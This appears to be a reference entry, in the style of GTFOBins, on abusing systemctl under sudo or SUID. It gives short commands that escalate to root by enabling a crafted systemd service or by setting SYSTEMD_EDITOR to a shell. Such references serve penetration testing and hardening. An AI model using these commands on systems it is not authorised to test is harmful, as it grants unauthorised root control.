This executable can spawn an interactive system shell.
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo '[Service]
Type=oneshot
ExecStart=/path/to/command
[Install]
WantedBy=multi-user.target' >/path/to/temp-file.service
systemctl link /path/to/temp-file.service
systemctl enable --now /path/to/temp-file.service
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
echo '[Service]
Type=oneshot
ExecStart=/path/to/command
[Install]
WantedBy=multi-user.target' >/path/to/temp-file.service
systemctl link /path/to/temp-file.service
systemctl enable --now /path/to/temp-file.service
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo /bin/sh >/path/to/temp-file
chmod +x /path/to/temp-file
SYSTEMD_EDITOR=/path/to/temp-file systemctl edit basic.target
This executable can inherit functions from another.
This function can be performed by any unprivileged user.
systemctl
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
systemctl
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
systemctl